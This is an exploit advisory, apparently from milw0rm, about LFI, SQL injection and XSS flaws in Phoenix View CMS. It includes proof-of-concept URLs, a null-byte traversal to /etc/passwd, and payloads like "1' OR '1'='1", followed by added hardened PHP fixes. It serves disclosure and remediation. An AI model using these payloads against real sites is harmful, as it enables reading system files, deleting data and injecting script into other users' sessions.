tw8

[RST]Phoenix View CMS - Multiple Vulns [LFI][SQLI][XSS]


Link: http://milw0rm.com/exploits/5578

Many thanks to kw3rln ... he knows why :P.

#########################################################################################

Phoenix View CMS <= Pre Alpha2 Multiple Vulnerabilities [LFI][SQLI][XSS]
#########################################################################################

Found by : tw8
Date : 8.05.2008
Website && Forum : http://rstcenter.com && http://rstcenter.com/forum/
Bug type : LFI, SQLI & XSS
#########################################################################################

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Phoenix View CMS
Version : <= Pre Alpha2
Vendor : http://sourceforge.net/projects/phoenixviewcms/
Description :

Phoenix View CMS is going to be an easy-to-use Content-Management-System. It uses a
self-written template engine. The CMS will use a self-written API, and it is going to be
easy to write your own plugins and modules.
########################################################################################

Vulnerabilities:
~~~~~~~~~~~~~~~

Vulnerable code #1 in admin/admin_frame.php [LFI]+[XSS]:

----------------------------------------------------------------------------


    if(isset($_GET["ltarget"])) {
        $ltarget = $_GET["ltarget"];        // attacker-controlled, never validated
        $_SESSION["lastsecaction"] = '';
    }
    ......
    // file_exists() is the only gate. A %00 in $ltarget truncates the path before
    // the appended ".php" on PHP builds that still pass null bytes to the filesystem,
    // so a value such as "../../../../etc/passwd%00" satisfies the check.
    if(!file_exists(SYSTEM_ADMIN_path . "/" . $ltarget . ".php")) {
        // $ltarget is echoed back unescaped here (German: "System admin page ... was not found")
        printError("System Admin Seite \"" . $ltarget . "\" wurde nicht gefunden.");
    }
    else {
        // note: no "/" between SYSTEM_ADMIN_path and $ltarget, unlike the check above
        include SYSTEM_ADMIN_path . $ltarget . ".php";
    }


----------------------------------------------------------------------------

POC #1:

http://www.target.com/path/admin/admin_frame.php?ltarget=[LOCAL FILE]%00

http://www.target.com/path/admin/admin_frame.php?ltarget=[XSS]

Note: the first request depends on the "%00" dropping the appended ".php". That only
works on PHP releases before 5.3.4; from 5.3.4 on, paths containing a null byte are
rejected and the include never happens. When the file_exists() check fails, the same
parameter is reflected through printError() without escaping, which is the second
(XSS) request.
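The fix for #1 is to never build an include path from the request. The following is an added example of a hardened dispatcher for admin_frame.php; it is not Phoenix View CMS code. SYSTEM_ADMIN_path and printError() are taken from the original listing, the page names in the allow-list are hypothetical, and resolveAdminPage() is a helper introduced here.

```php
<?php
// Added example, not Phoenix View CMS code: hardened replacement for the
// admin_frame.php dispatcher. Assumes SYSTEM_ADMIN_path (constant) and
// printError() exist as in the original. ADMIN_PAGES is a hypothetical list.

// Only pages that ship with the admin area may ever be included.
const ADMIN_PAGES = ['dashboard', 'settings', 'users'];   // hypothetical names

/**
 * Map the untrusted ?ltarget= value to an absolute file path, or return null.
 * Anything outside the allow-list is refused, so traversal ("../../etc/passwd")
 * and null-byte truncation ("/etc/passwd%00") never reach include.
 */
function resolveAdminPage(string $ltarget, string $adminPath, array $allowed): ?string
{
    // Structural check first: a page name is a short identifier, nothing else.
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $ltarget)) {
        return null;
    }
    // Exact match against the allow-list (strict comparison, no type juggling).
    if (!in_array($ltarget, $allowed, true)) {
        return null;
    }
    // Build the path ourselves; the request only contributed a validated name.
    $path = rtrim($adminPath, '/') . '/' . $ltarget . '.php';
    return is_file($path) ? $path : null;
}

$ltarget = $_GET['ltarget'] ?? '';
$page    = resolveAdminPage($ltarget, SYSTEM_ADMIN_path, ADMIN_PAGES);

if ($page === null) {
    // Escape before reflecting, so the error message cannot carry HTML or script.
    printError('System admin page "' . htmlspecialchars($ltarget, ENT_QUOTES, 'UTF-8') . '" was not found.');
} else {
    include $page;
}
```

With this shape, "[LOCAL FILE]%00" fails the regex before any filesystem call, and "[XSS]" is reflected only after htmlspecialchars(), so both POC #1 requests produce an inert error page.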

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerable code #2 admin/module/*.php

[SQLI]:

----------------------------------------------------------------------------


    class db {

    ......

        // Thin wrapper: the query string is passed to mysql_query() exactly as built
        // by the caller. mysql_query() executes a single statement, so stacked
        // queries are not possible, but the caller's quoting is the only protection.
        function query($query, $ressave = false) {
            if($ressave) return mysql_query($query);
            else {
                $this->res = mysql_query($query);
                return $this->res;
            }
        }
    ......
    }
    ......

    if(isset($_GET["del"])) {
        // $_GET["del"] is concatenated straight into the single-quoted id value,
        // so a ' in the parameter closes the string and rewrites the WHERE clause
        $db->query("DELETE from " . SYSTEM_dbpref . "todo where id='" . $_GET["del"] . "'");
        echo "<font color='green'>Löschen erfolgreich</font>\n";   // German: "Delete successful"
    }

/*Vulnerable files:
gbuch.admin.php
links.admin.php
menue.admin.php
news.admin.php
todo.admin.php
*/


----------------------------------------------------------------------------

POC #2:

http://www.target.com/path/admin/module/vulnerable_file.php?del=[SQLI]

Note: the injected value sits inside a single-quoted id, so the payload has to start
with a single quote to break out. Because mysql_query() runs one statement only,
the practical impact is a tautology that widens the DELETE to every row of the
table, or blind inference through the WHERE clause, not a second stacked statement.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerable code #3 admin/module/*.php [XSS]:

----------------------------------------------------------------------------


    <!-- the conf parameter is echoed into a single-quoted attribute with no escaping;
         $_POST["conf"] is read even when it is not set, which also raises a PHP notice -->
    <input type='hidden' name='conf' value='<?php if(isset($_GET["conf"])) echo $_GET["conf"]; else echo $_POST["conf"]; ?>' />

/*Vulnerable files:
gbuch.admin.php
links.admin.php
menue.admin.php
news.admin.php
todo.admin.php
*/


----------------------------------------------------------------------------

POC #3:

http://www.target.com/path/admin/module/vulnerable_file.php?conf=[XSS]

Note: the value lands inside value='...', so the payload must begin with a single
quote and a closing ">" to leave the attribute before any tag it adds is parsed.
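Vulnerabilities #2 and #3 live in the same admin/module/*.admin.php files, so one corrected handler covers both. The following is an added example, not code from Phoenix View CMS: it rewrites the ?del= deletion with a bound integer parameter and renders the hidden "conf" field through htmlspecialchars(). It assumes a mysqli connection in $mysqli (the original uses the old mysql_* functions through its db class) and the SYSTEM_dbpref table-prefix constant from the original; deleteTodo() and confField() are helpers introduced here.

```php
<?php
// Added example, not Phoenix View CMS code: the ?del= handler and the hidden
// "conf" field from admin/module/todo.admin.php rewritten safely.
// Assumes a mysqli connection in $mysqli (hypothetical) and the table prefix
// constant SYSTEM_dbpref from the original listing.

/**
 * Delete one todo row by id. The id is validated as a plain positive integer
 * and then bound as a parameter, so a value such as "1' OR '1'='1" can no
 * longer alter the WHERE clause. Returns the number of rows actually deleted.
 */
function deleteTodo(mysqli $db, string $untrustedId): int
{
    // ctype_digit() rejects "", signs, spaces and quotes before the DB is touched.
    if (!ctype_digit($untrustedId)) {
        return 0;
    }
    $id = (int) $untrustedId;

    // SYSTEM_dbpref is a trusted constant; the request never reaches the SQL text.
    $stmt = $db->prepare('DELETE FROM ' . SYSTEM_dbpref . 'todo WHERE id = ?');
    if ($stmt === false) {
        return 0;
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $deleted = $stmt->affected_rows;
    $stmt->close();
    return $deleted;
}

/**
 * Render the hidden "conf" field with the value escaped for an attribute.
 * ENT_QUOTES also encodes the single quote, which is what the original
 * value='...' context needs to keep "'><script>" inside the attribute.
 */
function confField(?string $conf): string
{
    $safe = htmlspecialchars($conf ?? '', ENT_QUOTES, 'UTF-8');
    return "<input type='hidden' name='conf' value='" . $safe . "' />";
}

if (isset($_GET['del'])) {
    $n = deleteTodo($mysqli, (string) $_GET['del']);
    echo $n > 0
        ? "<font color='green'>Delete successful</font>\n"
        : "<font color='red'>Nothing deleted</font>\n";
}

// Prefer GET, fall back to POST, and tolerate neither being set (no PHP notice).
echo confField($_GET['conf'] ?? $_POST['conf'] ?? null);
```

Against POC #2, "?del=1' OR '1'='1" now returns 0 without running any query; against POC #3, the payload is emitted as "&#039;&gt;&lt;script&gt;..." and stays inert inside the attribute.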

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Status:

~~~~~~~

Vendor has not been contacted yet.

###########################################################################

Shoutz to vladiii, kw3rln, Nemessis, Kenpachi, Moubik, DranaXum, Inside, str0ke & all RST Members.

###########################################################################

Contact:

~~~~~~~

Website: http://rstcenter.com

Forum: http://rstcenter.com/forum

E-Mail: ym_tw8[at]yahoo[dot]com

################################ [ EOF ] ##################################

# milw0rm.com [2008-05-09]
